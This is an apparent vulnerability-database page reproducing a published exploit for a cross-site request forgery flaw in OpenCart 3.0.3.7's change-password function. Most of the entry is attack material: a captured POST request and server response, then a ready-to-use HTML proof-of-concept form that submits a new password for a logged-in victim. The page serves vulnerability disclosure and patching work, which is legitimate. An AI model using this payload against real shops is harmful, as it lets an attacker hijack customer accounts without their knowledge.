Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

OpenCart 3.0.3.7 Cross Site Request Forgery

🗓️ 09 Jun 2021 00:00:00Reported by Mert DasType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 285 Views

OpenCart 3.0.3.7 - 'Change Password' CSRF Vulnerability by Mert Da

Code
`# Exploit Title : OpenCart 3.0.3.7 - 'Change Password' Cross-Site Request Forgery (CSRF)  
# Date : 2021/08/06  
# Exploit Author : Mert Daş [email protected]  
# Software Link : http://www.opencart.com/index.php?route=download/download  
: https://github.com/opencart  
# Software web : www.opencart.com  
# Tested on: Server : Xampp  
  
# Cross-site request forgery  
  
OpenCart is an open source shoping cart system , suffers from Cross-site request forgery through which attacker can manipulate user data via sending him malicious craft url.  
  
OpenCart is not using any security token to prevent it against CSRF.  
It is vulnerable to all location inside User panel.  
  
Header  
  
----------------------------------------------------------  
http://localhost/index.php?route=account/password  
  
POST /opencart/index.php?route=account/password HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------3890527419799841332130342675  
Content-Length: 300  
Origin: http://127.0.0.1  
Connection: close  
Referer: http://127.0.0.1/opencart/index.php?route=account/password  
Cookie: language=en-gb; currency=EUR; OCSESSID=b21a152616460d44029878c9a0  
Upgrade-Insecure-Requests: 1  
  
-----------------------------3890527419799841332130342675  
Content-Disposition: form-data; name="password"  
  
123asd!  
-----------------------------3890527419799841332130342675  
Content-Disposition: form-data; name="confirm"  
  
123asd!  
-----------------------------3890527419799841332130342675--  
  
  
Response  
  
HTTP/1.1 302 Found  
Date: Tue, 08 Jun 2021 16:52:59 GMT  
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20  
X-Powered-By: PHP/7.4.20  
Set-Cookie: OCSESSID=b21a152616460d44029878c9a0; path=/  
Location: http://127.0.0.1/opencart/index.php?route=account/account  
Content-Length: 0  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
  
----------------------------------------------------------  
  
Simple Poc to change user Password  
  
<html>  
<!-- CSRF PoC - generated by Burp Suite Professional -->  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="http://127.0.0.1/opencart/index.php?route=account/password" method="POST" enctype="multipart/form-data">  
<input type="hidden" name="password" value="1234asd!" />  
<input type="hidden" name="confirm" value="1234asd!" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
09 Jun 2021 00:00Current
0.5Low risk
Vulners AI Score0.5
opencartcsrfvulnerabilitycross-site request forgerysecurity tokenuser panel
285